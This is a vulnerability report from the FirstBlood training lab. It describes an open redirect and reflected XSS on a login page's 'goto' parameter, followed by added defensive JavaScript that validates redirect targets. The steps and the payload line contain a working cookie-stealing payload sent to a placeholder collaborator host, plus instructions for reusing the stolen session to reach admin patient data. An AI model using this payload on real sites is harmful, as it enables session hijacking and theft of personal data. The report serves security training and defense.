FirstBlood-#432: Open Redirect on login page with "goto" parameter leading to account takeover
This issue was discovered on FirstBlood v2.0.0 (issues patched)



On 2021-10-25, xnl-h4ck3r Level 4 reported:

Summary

There is a hidden parameter called goto on /login.php that redirects to another location after login. There is an open redirect vulnerability that allows an attacker to craft a URL to send to the victim so that after they log in on the genuine First Blood site, they are redirected to the attacker's website, and the auth cookies are also passed to the attacker's site. The web application fails to filter the javascript URI upon redirecting.

Steps to Reproduce

  1. Go to the link http://firstbloodhackers.com:{PORT}/login.php?goto=j%09avascript:document.location=%27http://{BURP_COLLAB_URL}/%27%2bdocument.cookie
  2. Enter a valid user name and password and click SECURE LOGIN
  3. Observe that the user is taken to the attacker's website, and the cookies and their values have been leaked to the attacker.
  4. Clear all cookies and go to the web app again but do not log in.
  5. Add the cookie shown in Step 3 and go to /drpanel/index.php and observe that you are now logged in as admin and can view patient data.

Impact

If a victim goes to the web app using this link and logs in, the attacker is able to capture the auth cookies and redirect the user wherever they want. The user may be unaware of what has happened, and the attacker can use the cookies to access the doctor management panel as them and view patient PII data.

P3 Medium

Endpoint: /login.php

Parameter: goto

Payload: j%09avascript:document.location=%27http://{BURP_COLLAB_URL}/%27%2bdocument.cookie


FirstBlood ID: 39
Vulnerability Type: Reflective XSS

Our mistake: The parameter "goto" on login.php should have been "fixed" when redirecting to prevent XSS but due to an oversight from Sean and Karl, the new code did not make it into production. This has since been updated since the event ended and you're recommended to re-try. It's related to bug ID 26 because the idea was developers fixed *this* one (when redirecting) but forgot the other reflection.
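
A defensive check for the goto parameter, as an added example that is not FirstBlood's code or part of the original report: it contrasts a prefix-matching filter, which the tab inside the scheme name slips past, with validation that parses the value the way a browser does and accepts only same-origin http(s) targets. `SITE_ORIGIN`, `FALLBACK`, the function names and the sample values are assumptions made for illustration.

```javascript
// Added example: validating a post-login redirect target such as "goto".
// SITE_ORIGIN and FALLBACK are assumed values, not taken from FirstBlood.
const SITE_ORIGIN = "http://firstblood.example";
const FALLBACK = "/drpanel/index.php";

// Naive filter: looks for a literal "javascript:" prefix, so a tab
// character inside the scheme name is enough to get past it.
function naiveIsBlocked(target) {
  return target.trim().toLowerCase().startsWith("javascript:");
}

// Hardened check: resolve the value with the WHATWG URL parser, then accept
// it only if it is http(s) and stays on our own origin.
function safeRedirectTarget(raw, origin = SITE_ORIGIN, fallback = FALLBACK) {
  if (typeof raw !== "string" || raw.length === 0) return fallback;
  let url;
  try {
    // URL parsing removes tab/CR/LF, so "j\tavascript:" is seen here as
    // the javascript: scheme, exactly as the browser would treat it.
    url = new URL(raw, origin);
  } catch {
    return fallback; // unparseable input never reaches the redirect
  }
  if (url.protocol !== "http:" && url.protocol !== "https:") return fallback;
  if (url.origin !== new URL(origin).origin) return fallback;
  // Hand back only path, query and fragment; never echo a scheme or host.
  return url.pathname + url.search + url.hash;
}

// Reads "goto" from a raw query string (percent-decoding %09 to a tab).
function redirectAfterLogin(queryString) {
  return safeRedirectTarget(new URLSearchParams(queryString).get("goto"));
}

// Constructed sample inputs with harmless bodies.
const samples = [
  "goto=/drpanel/index.php?view=1",  // legitimate same-site path
  "goto=j%09avascript:void(0)",      // tab-split scheme, as in the report
  "goto=//other.example/landing",    // protocol-relative off-site target
  "goto=/%5Cother.example/landing",  // backslash form of the same thing
];
for (const qs of samples) console.log(qs, "->", redirectAfterLogin(qs));
```

Returning a path rebuilt from the parsed URL, rather than the raw parameter, keeps the value that reaches the redirect identical to the value that was validated.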